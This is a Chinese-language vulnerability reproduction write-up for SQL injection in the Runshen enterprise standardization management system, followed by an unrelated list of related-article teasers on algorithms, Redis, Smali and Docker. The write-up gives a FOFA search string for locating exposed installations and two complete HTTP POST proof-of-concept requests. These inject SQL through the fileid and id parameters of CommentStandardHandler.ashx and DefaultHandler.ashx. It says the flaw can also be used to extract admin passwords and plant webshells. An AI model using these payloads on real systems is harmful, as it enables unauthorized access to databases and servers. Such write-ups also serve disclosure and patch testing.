润申信息企业标准化管理系统 SQL注入漏洞复现

news/2024/7/9 7:50:06

0x01 产品简介

 润申信息科技企业标准化管理系统通过给客户提供各种灵活的标准法规信息化管理解决方案,帮助他们实现了高效的标准法规管理,完成个性化标准法规库的信息化建设。

0x02 漏洞概述

 润申信息科技企业标准化管理系统 CommentStandardHandler.ashx、DefaultHandler.ashx接口处存在SQL注入漏洞。攻击者可利用漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:body="企业标准化管理系统"

0x04 漏洞复现

PoC-1

POST /PDCA/ashx/CommentStandardHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

action=detailInfo&fileid=1 and (select @@version)>0--

查询数据库版本

PoC-2

POST /ashx/DefaultHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

action=GetDetail&status=300&id=1 and (select db_name())>0--

查询当前数据库名 

0x05 修复建议 

厂商尚已漏洞修补方案,请关注厂商主页及时更新:http://www.rainsome.cn/


http://lihuaxi.xjx100.cn/news/1854134.html

相关文章

二进制求和

这篇文章会收录到 : 算法通关村第十三关-白银挑战数字与数学高频问题-CSDN博客 二进制求和 描述 : 给你两个二进制字符串 a 和 b ,以二进制字符串的形式返回它们的和。 题目 : LeetCode 67.二进制求和 : 67. 二进制求和 分析 : 这个题也是用字符串来表示数据的…

目标检测YOLO实战应用案例100讲-基于Yolo算法的单晶硅晶线检测系统

目录 前言 国内外研究现状 相关理论技术简介 2.1传统图像目标检测方法

Numpy实践_时间日期和时间增量

文章目录 datetime64 基础datetime64 和 timedelta64 运算datetime64 的应用 datetime64 基础 1.从字符串创建 datetime64 类型时,默认情况下,numpy 会根据字符串自动选择对应的单位。 import numpy as npa np.datetime64(2020-03-01) print(a, a.dty…

中职组网络安全-FTPServer20221010.img(环境+解析)

任务环境说明: √服务器场景:FTPServer20221010.img √服务器操作系统:未知(关闭链接) √FTP用户名:attack817 密码:attack817 1.分析attack.pcapng数据包文件,通过分析数据包attack…

牛客算法题 HJ99 自守数 golang实现

题目 HJ99 自守数 描述 自守数是指一个数的平方的尾数等于该数自身的自然数。例如:25^2 625,76^2 5776,9376^2 87909376。请求出n(包括n)以内的自守数的个数数据范围: 1 ≤ � ≤ 100001≤n≤10000 输入描述&…

【Redis】Redis底层原理(持久化 分布式锁)

目录 持久化 RDB 给哪些内存数据做快照? RDB文件的生成是否会阻塞主线程 bgsave执的行流程 RDB文件 RDB的优缺点 RDB的优点 RDB的缺点 Redis中RDB导致的数据丢失问题 AOF 使用AOF AOF的工作流程 命令写入 重写机制 重启加载 文件校验 RDB-AOF混合持久化 Red…

【笔记】Smali语法

Smali语法 Smali 是一种汇编语言,通常用于 Android 应用程序的反汇编和修改。Smali 代码是 Dalvik 虚拟机指令的文本表示形式。以下是一些常见的 Smali 语法元素: 1. 基本结构: Smali 文件是文本文件,通常以 .smali 扩展名结尾。每个 Smali…

Dockerfile构建Python-Ubuntu-Opencv环境

简介 由于最近这段时间Docker官方的python镜像中的apt-key过期了导致apt无法使用只能从原始的Ubuntu镜像开始构建python环境 Dockerfile FROM ubuntu:20.04 AS builder-image# 将安装过程设置为非交互式防止卡死 ENV DEBIAN_FRONTENDnoninteractiveRUN apt-get update &…